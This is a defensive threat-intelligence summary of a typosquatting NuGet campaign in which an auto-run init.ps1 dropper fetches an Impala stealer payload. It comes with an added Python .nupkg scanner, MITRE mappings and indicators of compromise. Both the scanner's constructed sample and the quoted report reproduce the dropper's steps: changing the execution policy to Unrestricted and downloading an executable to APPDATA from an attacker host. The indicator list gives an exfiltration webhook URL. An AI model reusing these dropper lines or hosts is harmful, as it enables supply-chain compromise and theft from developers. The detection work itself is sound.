JFrog Security Research uncovered a sophisticated NuGet-based campaign targeting .NET developers, employing typosquatting and deceptive metadata to push a PowerShell-based dropper that downloads a second-stage Impala payload. The attack demonstrates how NuGet can be abused to auto-run code on installation and deliver a configurable, low-level executable via HTTP, with exfiltration tied to Discord webhooks and other C2 capabilities. #NuGet #PowerShell #init_ps1 #Impala #DiscordWebhooks
Keypoints
- The campaign targeted .NET developers via the NuGet repository using typosquatting to spread malicious packages that were downloaded about 150K times before removal.
- A PowerShell dropper (init.ps1) runs on package installation, downloading a second-stage payload and executing it, showing that NuGet can still auto-run code in some scenarios.
- Attackers employed deception: mimicking legitimate packages, spoofing authors, and using misleading metadata to appear legitimate.
- The second-stage payload, named Impala, is a custom, low-level executable capable of crypto-stealing, Discord webhook exfiltration, Electron archive extraction, and an auto-updater mechanism.
- Defensive notes emphasize watching for typosquatting, inspecting the package's tools/ scripts (init.ps1/install.ps1/uninstall.ps1), and using NuGet Package Explorer to verify package contents before installation.
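The following is an added example (not from the JFrog report) of the kind of check the defensive notes call for: open a .nupkg (a zip archive), pull out any tools/ script that NuGet may auto-run, and flag the dropper behaviours described above (remote download, execution-policy tampering, %APPDATA% drop, Discord webhooks). The sample package and its init.ps1 are constructed for the demonstration, with a placeholder URL; the pattern list is an assumed heuristic, not an exhaustive one.

```python
import io
import re
import zipfile

# Script paths NuGet has historically auto-run on install/uninstall (matched case-insensitively).
AUTORUN_SCRIPTS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")

# Heuristic patterns for the behaviours the dropper described above exhibits (assumed list).
SUSPICIOUS_PATTERNS = {
    "remote_download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "execution_policy_tamper": re.compile(r"ExecutionPolicy.*Unrestricted|Set-ExecutionPolicy", re.I),
    "discord_webhook": re.compile(r"discord(app)?\.com/api/webhooks", re.I),
    "appdata_drop": re.compile(r"\$env:APPDATA", re.I),
}


def scan_nupkg(data: bytes) -> dict:
    """Return {script_path: [finding, ...]} for every auto-run script found in a .nupkg."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.lower() in AUTORUN_SCRIPTS:
                text = z.read(name).decode("utf-8", errors="replace")
                findings[name] = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    return findings


def build_sample_nupkg(init_script: str) -> bytes:
    """Constructed sample package: a minimal .nuspec plus tools/init.ps1 (not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Sample.Package.nuspec", "<package><metadata><id>Sample.Package</id></metadata></package>")
        z.writestr("tools/init.ps1", init_script)
    return buf.getvalue()


# Constructed script modelled on the behaviours the report describes; the URL is a placeholder.
SAMPLE_DROPPER = r"""
param($installPath, $toolsPath, $package, $project)
New-ItemProperty -Path 'HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name 'ExecutionPolicy' -Value 'Unrestricted' -PropertyType String -Force
$ProcName = 'updater.exe'
$WebFile = "http://placeholder.invalid/$ProcName"
(New-Object System.Net.WebClient).DownloadFile($WebFile, "$env:APPDATA\$ProcName")
"""

# A harmless init.ps1 for comparison: it should produce no findings.
BENIGN_INIT = "param($installPath, $toolsPath, $package, $project)\nWrite-Host 'Installed'\n"

if __name__ == "__main__":
    for label, script in (("dropper", SAMPLE_DROPPER), ("benign", BENIGN_INIT)):
        print(label, scan_nupkg(build_sample_nupkg(script)))
```

Run it against a real .nupkg by passing the file's bytes to scan_nupkg; a non-empty findings list is a reason to open the package in NuGet Package Explorer before installing.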
MITRE Techniques
- [T1195] Supply Chain Compromise – Malicious NuGet packages used to deliver payload. Quote: “…attack targeting .NET developers via the NuGet repository, using sophisticated typosquatting techniques…”
- [T1036] Masquerading – Package owner names and metadata designed to appear legitimate. Quote: “The package owner names used terms which attempt to make the package appear more legitimate (BinanceOfficial, NuGetDev, OfficialDevelopmentTeam)…”
- [T1059.001] PowerShell – init.ps1 (tools/init.ps1) executed to run commands on install. Quote: “PowerShell script that would execute upon installation” and “the init script automatic execution won’t occur while using the NuGet CLI.”
- [T1105] Ingress Tool Transfer – The dropper downloads an executable from a remote server. Quote: “$WebFile = 'http://62[.]182[.]84[.]61/4563636/$ProcName'” and “(New-Object System.Net.WebClient).DownloadFile($WebFile, "$env:APPDATA\$ProcName")”
- [T1562.001] Impair Defenses – Execution policy changed to Unrestricted to allow script execution. Quote: “New-ItemProperty -Path 'HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name 'ExecutionPolicy' -Value 'Unrestricted' -PropertyType String -Force”
- [T1567.002] Exfiltration to Web Services – Crypto wallet exfil via Discord webhooks. Quote: “Discord Webhooks, which may suggest the payload tries to exfiltrate crypto wallets via Discord webhooks”
Indicators of Compromise
- [URL] Discord webhook used for data exfiltration – https://discord.com/api/webhooks/1076330498026115102/MLkgrUiivlgAoFWyvkSpLsBE3DMaDZd9cxPK3k9XQPyh6dw55jktV6qfDgxbs5AaY7Py
- [IP Address] Command-and-control / payload download hosts – 62.182.84.61, 194.233.93.50, and 195.58.39.167
- [URL] Pastebin-like reference containing sample C2/payload information – https://paste bingner.com/paste/xden6/raw
- [File] Updater component used by malware – Squirrel-2021Updater.exe